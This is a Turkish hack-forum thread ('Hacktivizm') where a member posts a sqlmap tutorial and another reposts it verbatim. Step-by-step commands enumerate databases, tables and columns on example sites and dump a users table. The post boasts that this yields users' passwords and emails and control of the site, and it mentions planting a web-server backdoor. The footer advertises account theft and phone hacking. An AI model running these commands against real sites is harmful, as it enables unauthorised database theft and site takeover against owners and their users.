Kullanıcıların Dikkatine!

Konularda yapılan kısaltmalı ve geçiştirilmiş mesajlar (adsadas, haha, sjsksjsdjks, asdsd, nokta, random, sayı vb.) yasaklanma sebebidir. Mağduriyet yaşanmaması için bu duruma dikkat etmelisiniz.

Daha Fazlası

Hacktivizm Online

Hacktivizm sitesi hack kültürünü benimsemiş kişiler tarafından 2020 yılında kuruldu. Kuruluş amacı Türkiye'nin en büyük hack forumu olmak ve bilgi alışverişinde bulunmaktır.

Daha Fazlası

Konu Açarken Dikkat Edilmesi Gerekenler

Forumda oluşan / oluşması öngörülen görüntü kirliliğine engel olmak ve başlıkların daha temiz dil ile açılması amacıyla kurallarımıza bazı bağımlı / bağımsız maddeler eklemek durumundayız.

Daha Fazlası

Sqlmap nedir,Nasıl Kullanılır?

anonymous

Kayıtlı Üye
Katılım
26 Aralık 2020
Mesajlar
67
Tepkime puanı
98
İlgi Alanlarınız
pentest
Cinsiyet
  1. Erkek

Sqlmap nedir?

Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar.
sqlmap_bg2.jpg

Sqlmap ile ne yapabilirim?

-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmek
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.

Sqlmap nasıl kullanılır?


Sqlmap ile siteleri kontrol etmek için
Kod:
sqlmap -u URL

Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8

Sqlmap ile Database Listelenmesi ve Dump Edilmesi

Database listeleyebilmek için -dbs parametresi kullanılır.
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs

Database İçerisinden Bilgileri Almak
Örneğin orneksite.org sitesi için iki veritabanı bulundu

31d44879335c90ee72aec3b37cad48af.08-1.jpg
Main_wellerpools veritabanındaki tabloların listesini almak istiyorum
Kod:
sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables

Tabloların listesi

51bf6bd326c70cbf83c409134c81b20d.10-1.jpg

Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns

3157cddd313764901d9ba218ec6f2cc0.11-1.jpg
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump
d74fc3a589cbef45a02c0ef6a234bce0.12-1.jpg
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz

Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar
 

KocaReis

Developer
Katılım
26 Ağustos 1971
Mesajlar
837
Tepkime puanı
2,697
Eline sağlık
 

Can

La Turquie Kémaliste
Admin
Katılım
19 Aralık 2020
Mesajlar
2,042
Tepkime puanı
6,807
Konum
Türkiye
İlgi Alanlarınız
ham radio
Cinsiyet
  1. Erkek
eline sağlık anon
 

Nevermind

Elmas
Katılım
15 Şubat 2023
Mesajlar
1,407
Tepkime puanı
10,622
Konum
403 Forbidden
İlgi Alanlarınız
Hesapların
Cinsiyet
  1. Erkek

Sqlmap nedir?

Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar.
Ekli dosyayı görüntüle 75

Sqlmap ile ne yapabilirim?

-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmek
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.

Sqlmap nasıl kullanılır?


Sqlmap ile siteleri kontrol etmek için
Kod:
sqlmap -u URL

Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8

Sqlmap ile Database Listelenmesi ve Dump Edilmesi

Database listeleyebilmek için -dbs parametresi kullanılır.
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs

Database İçerisinden Bilgileri Almak
Örneğin orneksite.org sitesi için iki veritabanı bulundu

Ekli dosyayı görüntüle 76
Main_wellerpools veritabanındaki tabloların listesini almak istiyorum
Kod:
sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables

Tabloların listesi

Ekli dosyayı görüntüle 77

Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns

Ekli dosyayı görüntüle 78
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump
Ekli dosyayı görüntüle 79
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz

Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar
Eline sağlık.
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst